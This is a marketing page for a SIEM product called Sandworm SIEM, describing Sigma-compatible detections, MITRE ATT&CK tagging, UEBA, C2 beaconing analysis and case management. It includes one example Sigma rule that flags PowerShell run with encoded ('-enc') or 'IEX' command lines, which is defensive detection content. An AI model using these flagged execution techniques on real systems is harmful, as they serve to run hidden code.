Signal, not story.
A SIEM that tells you what happened in the language of MITRE ATT&CK. Sigma-compatible rules you can read and tune. Case files built in.
title: Suspicious PowerShell
logsource:
product: windows
detection:
selection:
Image|endswith: powershell.exe
CommandLine|contains:
- '-enc'
- 'IEX'
condition: selection
level: highWhat Sandworm SIEM does.
Sigma-compatible detection content
Read, tune, and write detections in the open Sigma format. No proprietary DSL to learn — your rules are portable from day one.
MITRE ATT&CK native
Every rule is tagged to a MITRE technique. Your coverage heatmap shows exactly which tactics are covered and which are blind spots.
UEBA baseline correlation
User and entity behavior analytics surface deviations from learned baselines. Spot credential abuse, lateral movement, and insider anomalies without writing a rule for every pattern.
C2 detection and beaconing analysis
Built-in correlation logic identifies command-and-control beaconing patterns — periodic callouts, domain-generation algorithms, and protocol tunneling — without requiring manual threshold tuning.
Streaming detection pipeline
Events flow through the detection engine in near-real-time. The alert fires on the event — not in a nightly batch job.
Case management and evidence preservation
Every fired detection becomes a case with a structured timeline, assigned owner, and raw log evidence. Handoff-ready without cleanup.
Threat hunting in the same interface
Query log history with the same syntax you write detection rules in. No context-switch to a separate hunting tool.
How Sandworm SIEM works
- 1
Ingest and normalize
Logs arrive from syslog, OCSF-compliant sources, EDRs, identity providers, and cloud audit trails. Sandworm SIEM normalizes each event to a common schema before it enters the detection pipeline.
- 2
Correlate and score
The streaming correlation engine evaluates every normalized event against your active Sigma rules and the UEBA baseline. Events that match a rule — or that deviate significantly from an entity's learned behavior — are promoted to findings with an assigned severity and MITRE technique tag.
- 3
Enrich and deduplicate
Findings are enriched with threat-intel context (IP reputation, known C2 infrastructure, hash lookups) and grouped to suppress duplicates before an alert is raised. One case per campaign, not one alert per packet.
- 4
Surface as a structured case
Each alert opens a case file: timeline of events, contributing raw logs, enrichment data, MITRE coverage tag, and a clear next-action prompt. Assign it, close it, or escalate it — all in Sandworm SIEM.
Built for teams that need answers, not alerts.
SOC analysts managing alert volume
Correlated cases replace raw alert floods. Analysts work the case, not the queue — with all the evidence already assembled.
Detection engineers who want rules in Git
Author Sigma rules, review them in a pull request, and ship them through CI. No GUI-only editor, no vendor lock-in.
Incident responders building the timeline
Every case is a handoff-ready document with a chronological event log. Skip the "what happened first?" reconstruction.
Threat hunters chasing hypotheses
Write ad-hoc queries against the same normalized log store your rules run on. Confirm the hunt hypothesis and promote it to a standing detection in one step.
Integrations
- Syslog/OCSF sources
- EDRs
- Identity providers
- Cloud audit logs
Frequently asked questions
- How is Sandworm SIEM deployed?
Sandworm SIEM ships as a Helm-managed set of Docker containers that run in your own infrastructure or a private cloud tenant. There is no shared multi-tenant data plane — raw logs never leave your environment. A managed-SaaS hosted option is being evaluated for a future release.
- Where does my log data go, and who can access it?
Event data lands in the data-plane components — ClickHouse for time-series log storage, Postgres for case state — that run inside your deployment. Sandworm has no access to your raw event data. Findings and case metadata are scoped to your tenant; no cross-tenant data sharing exists in the architecture.
- How does Sandworm SIEM licensing work?
Sandworm SIEM is included in the Platform and Sovereign bundles and is also available as a standalone à-la-carte product. There is no per-GB ingest charge and no per-alert fee. Full pricing is on the /pricing page.
- What makes this different from a legacy SIEM?
Legacy SIEMs are query engines: logs arrive, you search them later. Sandworm SIEM evaluates every normalized event through a streaming correlation engine the moment it arrives, tags each rule match with a MITRE ATT&CK technique, and opens a structured case automatically — no manual triage step to open a ticket. The UEBA baseline layer adds statistical anomaly detection on top of rule-based detection without requiring a separate product license.
- Does Sandworm SIEM ship with built-in detection content?
Yes. The product ships with a library of Sigma rules spanning common MITRE ATT&CK techniques. Because the rules are in open Sigma format, every detection is human-readable: you can audit the logic, modify thresholds, and submit improvements. Detection logic is never locked in a proprietary bytecode format.
- What UEBA and AI features are coming?
The current UEBA layer computes per-user and per-entity statistical baselines — mean and standard deviation across eight behavioral features per user-day. We are building Mendicant integration (the in-house engine is in development; frontier models handle production today) to support natural-language threat-hunting queries — type a hypothesis, get back matching events — and automated hypothesis generation from anomaly clusters. Neither capability is shipping yet.
Also in Sandworm.
See every detection fire.
We'll run Sandworm SIEM against a replay of your own logs — live.